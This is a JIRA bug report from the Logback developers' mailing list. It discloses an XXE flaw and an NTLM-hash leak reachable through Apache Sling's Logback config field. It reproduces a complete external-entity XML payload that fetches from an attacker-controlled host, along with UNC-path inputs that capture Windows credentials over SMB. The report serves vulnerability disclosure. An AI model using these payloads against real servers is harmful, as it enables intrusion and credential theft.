[logback-dev] [JIRA] (LOGBACK-1465) xxe and Information disclosure vulnerabilities in Logback
QOS.CH (JIRA)
noreply-jira at qos.ch
Thu May 9 09:48:00 CEST 2019
shuiboye created LOGBACK-1465:
---------------------------------
Summary: xxe and Information disclosure vulnerabilities in Logback
Key: LOGBACK-1465
URL: https://jira.qos.ch/browse/LOGBACK-1465
Project: logback
Issue Type: Bug
Components: logback-core
Environment: I test Apache Sling latest version 11 integrating Logback running on windows system
Reporter: shuiboye
Assignee: Logback dev list
Priority: Critical
Attachments: image-2019-05-09-15-41-28-419.png, image-2019-05-09-15-41-45-829.png, image-2019-05-09-15-43-09-668.png, image-2019-05-09-15-43-25-103.png
Hi,I find xxe and Information disclosure vulnerabilities in Logback when testing Apache Sling latest version 11 integrating Logback.
First I login in Sling as an admin.
*xxe*
The vulnerable url is [http://127.0.0.1:8080/system/console/configMgr/org.apache.sling.commons.log.LogManager].
In the " Logback Config File " field,I input "\\192.168.0.102\c$\xxe.xml" as shown below.
!image-2019-05-09-15-43-09-668.png!
The content of the xxe.xml under c:\ directory on the server 192.168.0.102 is
{quote}{quote}<?xml version="1.0"?>{quote}
{quote}<!DOCTYPE r [{quote}
{quote}<!ENTITY % sp SYSTEM "[http://192.168.0.102:8090/sling]">{quote}
{quote}%sp;{quote}
{quote}]>{quote}{quote}
After click "save" ,the netcat running on the server 192.168.0.102 and listening to the port 8090 receives the request as shown below.
!image-2019-05-09-15-43-25-103.png!
*information disclosure(Windows username and NTLM password hash)*
The vulnerable url is [http://127.0.0.1:8080/system/console/configMgr/org.apache.sling.commons.log.LogManager].
To ensure that the " Logback Config File " can result in the server's Windows username and NTLM password hash being leaked to remote attackers through SMB,I use another machine to visit the vulnerable page whose url is also [http://192.168.0.102:8080/system/console/configMgr/org.apache.sling.commons.log.LogManager].
In the " Logback Config File " field,I input "\\192.168.9.128\test".The ip 192.168.9.128 is anthoer machine used to capture smb.
!image-2019-05-09-15-41-28-419.png!
After click "save" ,the machine whose ip is 192.168.9.128 successfully captures the Windows username and NTLM password hash through SMB.
!image-2019-05-09-15-41-45-829.png!
--
This message was sent by Atlassian JIRA
(v7.3.1#73012)
More information about the logback-dev
mailing list